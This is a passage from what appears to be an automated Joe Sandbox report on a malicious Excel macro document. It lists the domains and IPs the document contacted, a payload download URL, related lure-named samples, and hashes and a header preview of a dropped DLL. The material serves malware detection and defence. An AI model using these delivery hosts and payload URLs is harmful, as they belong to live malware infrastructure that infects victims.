                                                                                                                                                            http://crt.sca1b.aregsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            https://aws.amazon.com/es/?nc1=h_lsregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://www.icra.org/vocabulary/.regsvr32.exe, 00000004.00000002.2100434449.0000000003277000.00000002.00000001.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              		unknown
                                                                                                                                                              https://d1.awsstatic.comregsvr32.exe, 00000004.00000003.2092889123.00000000027C3000.00000004.00000001.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://aws.amazon.com/de/regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://investor.msn.com/regsvr32.exe, 00000004.00000002.2099979951.0000000003090000.00000002.00000001.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://phd.aws.amazon.com/?nc2=h_m_scregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://a0.awsstatic.com/libra/1.0.385/libra-cardsuiregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                                                                                                                        		high

                                                                                                                                                                        Contacted IPs

                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                        Public

                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                        172.67.198.51
                                                                                                                                                                        		thousandsyears.downloadUnited States
                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                        13.224.92.73
                                                                                                                                                                        		dr49lng3n1n2s.cloudfront.netUnited States
                                                                                                                                                                        		16509AMAZON-02USfalse
                                                                                                                                                                        172.67.213.115
                                                                                                                                                                        		astrocycle.downloadUnited States
                                                                                                                                                                        		13335CLOUDFLARENETUStrue
                                                                                                                                                                        172.67.146.88
                                                                                                                                                                        		uppercilio.funUnited States
                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                        172.67.194.117
                                                                                                                                                                        		voopeople.funUnited States
                                                                                                                                                                        		13335CLOUDFLARENETUSfalse

                                                                                                                                                                        General Information

                                                                                                                                                                        Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                                        Analysis ID:444771
                                                                                                                                                                        Start date:06.07.2021
                                                                                                                                                                        Start time:17:01:28
                                                                                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                                                                                        Overall analysis duration:0h 6m 36s
                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                        Report type:full
                                                                                                                                                                        Sample file name:HRScheduleH3965005.xlsm
                                                                                                                                                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                                        Number of analysed new started processes analysed:6
                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                        Technologies:
                                                                                                                                                                        • HCA enabled
                                                                                                                                                                        • EGA enabled
                                                                                                                                                                        • HDC enabled
                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                        Detection:MAL
                                                                                                                                                                        Classification:mal100.troj.expl.evad.winXLSM@7/4@7/5
                                                                                                                                                                        EGA Information:Failed
                                                                                                                                                                        HDC Information:
                                                                                                                                                                        • Successful, ratio: 65.4% (good quality ratio 51.5%)
                                                                                                                                                                        • Quality average: 59.5%
                                                                                                                                                                        • Quality standard deviation: 39.6%
                                                                                                                                                                        HCA Information:
                                                                                                                                                                        • Successful, ratio: 76%
                                                                                                                                                                        • Number of executed functions: 12
                                                                                                                                                                        • Number of non-executed functions: 3
                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                        • Adjust boot time
                                                                                                                                                                        • Enable AMSI
                                                                                                                                                                        • Found application associated with file extension: .xlsm
                                                                                                                                                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                        • Attach to Office via COM
                                                                                                                                                                        • Scroll down
                                                                                                                                                                        • Close Viewer
                                                                                                                                                                        Warnings:
                                                                                                                                                                        Show All
                                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe
                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                        Simulations

                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                        No simulations

                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                        IPs

                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                        172.67.198.51PI-9823472110866.xlsmGet hashmaliciousBrowse
                                                                                                                                                                        • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                        uhr908723097306.xlsmGet hashmaliciousBrowse
                                                                                                                                                                        • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                        Vac.list07-2021-6014910.xlsmGet hashmaliciousBrowse
                                                                                                                                                                        • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                        Vac.list07-20214862208.xlsmGet hashmaliciousBrowse
                                                                                                                                                                        • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                        List-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                        • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                        HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                        • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                        sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                        • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                        Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                        • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                        Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                        • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                        DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                        • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                        PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                        • thousandsyears.download/div/44376,8555986111.jpg
                                                                                                                                                                        13.224.92.73sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                          Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                            Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                              DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                172.67.213.115PI-9823472110866.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • astrocycle.download/
                                                                                                                                                                                uhr908723097306.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • astrocycle.download/
                                                                                                                                                                                Vac.list07-2021-6014910.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • astrocycle.download/
                                                                                                                                                                                List-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • astrocycle.download/
                                                                                                                                                                                HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • astrocycle.download/
                                                                                                                                                                                sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • astrocycle.download/
                                                                                                                                                                                Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • astrocycle.download/
                                                                                                                                                                                DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • astrocycle.download/
                                                                                                                                                                                PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • astrocycle.download/

                                                                                                                                                                                Domains

                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                astrocycle.downloadPI-9823472110866.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.213.115
                                                                                                                                                                                uhr908723097306.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.213.115
                                                                                                                                                                                Vac.list07-2021-6014910.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.213.115
                                                                                                                                                                                Vac.list07-20214862208.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 104.21.37.209
                                                                                                                                                                                List-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.213.115
                                                                                                                                                                                HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.213.115
                                                                                                                                                                                Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 104.21.37.209
                                                                                                                                                                                sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.213.115
                                                                                                                                                                                Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 104.21.37.209
                                                                                                                                                                                Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.213.115
                                                                                                                                                                                DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.213.115
                                                                                                                                                                                PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.213.115
                                                                                                                                                                                voopeople.funPI-9823472110866.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 104.21.12.122
                                                                                                                                                                                uhr908723097306.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                Vac.list07-2021-6014910.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                Vac.list07-20214862208.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                List-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 104.21.12.122
                                                                                                                                                                                Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                thousandsyears.downloadPI-9823472110866.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.198.51
                                                                                                                                                                                uhr908723097306.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.198.51
                                                                                                                                                                                Vac.list07-2021-6014910.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.198.51
                                                                                                                                                                                Vac.list07-20214862208.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.198.51
                                                                                                                                                                                List-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.198.51
                                                                                                                                                                                HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.198.51
                                                                                                                                                                                Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 104.21.52.111
                                                                                                                                                                                sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.198.51
                                                                                                                                                                                Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.198.51
                                                                                                                                                                                Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.198.51
                                                                                                                                                                                DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.198.51
                                                                                                                                                                                PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.198.51
                                                                                                                                                                                uppercilio.funPI-9823472110866.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.146.88
                                                                                                                                                                                uhr908723097306.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 104.21.55.83
                                                                                                                                                                                Vac.list07-2021-6014910.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 104.21.55.83
                                                                                                                                                                                Vac.list07-20214862208.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.146.88
                                                                                                                                                                                List-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.146.88
                                                                                                                                                                                HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 104.21.55.83
                                                                                                                                                                                Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.146.88
                                                                                                                                                                                sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 104.21.55.83
                                                                                                                                                                                Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 104.21.55.83
                                                                                                                                                                                Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 104.21.55.83
                                                                                                                                                                                DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 104.21.55.83
                                                                                                                                                                                PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 104.21.55.83

                                                                                                                                                                                ASN

                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                CLOUDFLARENETUSCava.com_Fax-Message.htmGet hashmaliciousBrowse
                                                                                                                                                                                • 104.16.18.94
                                                                                                                                                                                VM52MC9YQDUO0P.htmlGet hashmaliciousBrowse
                                                                                                                                                                                • 104.16.18.94
                                                                                                                                                                                PI-9823472110866.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 104.21.12.122
                                                                                                                                                                                uhr908723097306.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                Vac.list07-2021-6014910.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                Vac.list07-20214862208.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                List-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 104.21.12.122
                                                                                                                                                                                runsys32.dllGet hashmaliciousBrowse
                                                                                                                                                                                • 104.20.185.68
                                                                                                                                                                                Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                SMR8OzIgNB.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 104.21.8.151
                                                                                                                                                                                Follow up Purchase order num- 4500262450.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 104.21.75.42
                                                                                                                                                                                PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                2790000.dllGet hashmaliciousBrowse
                                                                                                                                                                                • 104.20.185.68
                                                                                                                                                                                2770174.dllGet hashmaliciousBrowse
                                                                                                                                                                                • 104.20.185.68
                                                                                                                                                                                Payment Invoice.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.188.154
                                                                                                                                                                                CLOUDFLARENETUSCava.com_Fax-Message.htmGet hashmaliciousBrowse
                                                                                                                                                                                • 104.16.18.94
                                                                                                                                                                                VM52MC9YQDUO0P.htmlGet hashmaliciousBrowse
                                                                                                                                                                                • 104.16.18.94
                                                                                                                                                                                PI-9823472110866.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 104.21.12.122
                                                                                                                                                                                uhr908723097306.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                Vac.list07-2021-6014910.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                Vac.list07-20214862208.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                List-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 104.21.12.122
                                                                                                                                                                                runsys32.dllGet hashmaliciousBrowse
                                                                                                                                                                                • 104.20.185.68
                                                                                                                                                                                Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                SMR8OzIgNB.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 104.21.8.151
                                                                                                                                                                                Follow up Purchase order num- 4500262450.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 104.21.75.42
                                                                                                                                                                                PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.194.117
                                                                                                                                                                                2790000.dllGet hashmaliciousBrowse
                                                                                                                                                                                • 104.20.185.68
                                                                                                                                                                                2770174.dllGet hashmaliciousBrowse
                                                                                                                                                                                • 104.20.185.68
                                                                                                                                                                                Payment Invoice.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 172.67.188.154
                                                                                                                                                                                AMAZON-02USEnquiry#List For Order070621.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 13.59.53.244
                                                                                                                                                                                PI-9823472110866.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 143.204.91.74
                                                                                                                                                                                uhr908723097306.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 143.204.91.74
                                                                                                                                                                                Vac.list07-2021-6014910.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 143.204.91.74
                                                                                                                                                                                Vac.list07-20214862208.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 143.204.91.74
                                                                                                                                                                                List-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 13.225.75.73
                                                                                                                                                                                HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 13.225.75.73
                                                                                                                                                                                Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 13.225.75.73
                                                                                                                                                                                sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                Reciept 19129475.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                • 54.191.98.150
                                                                                                                                                                                Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 143.204.4.74
                                                                                                                                                                                GDTGz3GXCiNgYwtXT6qX3tY8eu8Mqj.msiGet hashmaliciousBrowse
                                                                                                                                                                                • 18.231.168.212
                                                                                                                                                                                39d0c1e7.msiGet hashmaliciousBrowse
                                                                                                                                                                                • 3.143.159.48
                                                                                                                                                                                Movcy_v1.0.0.apkGet hashmaliciousBrowse
                                                                                                                                                                                • 52.39.180.2
                                                                                                                                                                                order No. 00192099##001 pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 3.143.65.214
                                                                                                                                                                                f6718e02bc73edf5aab341fa0a7f75782bc72f7dd1a6e.dllGet hashmaliciousBrowse
                                                                                                                                                                                • 143.204.91.74
                                                                                                                                                                                lZYIQJNUsZ.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 13.249.12.162

                                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                05af1f5ca1b87cc9cc9b25185115607dPI-9823472110866.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                uhr908723097306.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                Vac.list07-2021-6014910.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                Vac.list07-20214862208.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                List-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                108020075.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                G-DECL G50 EURL.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                1.docGet hashmaliciousBrowse
                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                DECL G50 EURL!.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                Order No. 211128.docGet hashmaliciousBrowse
                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                SOA.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                DECL G50 EURL.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                • 13.224.92.73
                                                                                                                                                                                WO 378871.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                • 13.224.92.73

                                                                                                                                                                                Dropped Files

                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlPI-9823472110866.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                  uhr908723097306.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    Vac.list07-2021-6014910.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      Vac.list07-20214862208.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        List-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                          HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                            Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                              sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                  Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                      PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        C:\Users\user\XTOWN.dllPI-9823472110866.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                          uhr908723097306.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                            Vac.list07-2021-6014910.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                              Vac.list07-20214862208.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                List-4527768.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                  HRcontacts7752205.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                    Formtofill4184860.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      sbf0127365-7431059.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                        Outfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                          Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                              PI-210610.xlsmGet hashmaliciousBrowse

                                                                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml
                                                                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):57856
                                                                                                                                                                                                                                Entropy (8bit):4.963425128586394
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
                                                                                                                                                                                                                                MD5:7A1D163990ACE9CEF1D43831866109AB
                                                                                                                                                                                                                                SHA1:38A40E5AF9912C2935F74F2085D810A24325DC2A
                                                                                                                                                                                                                                SHA-256:2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
                                                                                                                                                                                                                                SHA-512:454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                • Filename: PI-9823472110866.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                • Filename: uhr908723097306.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                • Filename: Vac.list07-2021-6014910.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                • Filename: Vac.list07-20214862208.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                • Filename: List-4527768.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                • Filename: HRcontacts7752205.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                • Filename: Formtofill4184860.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                • Filename: sbf0127365-7431059.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                • Filename: Outfordelivery799862.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                • Filename: Purchaseconfirmation-137606.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                • Filename: DeliveryConf535215.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                • Filename: PI-210610.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M.M.M.>...N.M.K.M.I...L...L.RichM.........PE..d......`.........." .....:.......... .....................................................`.....................................................(....................................................................................P..@............................text...(8.......:.................. ..`.rdata..~....P.......>..............@..@.data...`...........................@....pdata..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D2027E4.png
                                                                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                                File Type:PNG image data, 1600 x 1600, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):174009
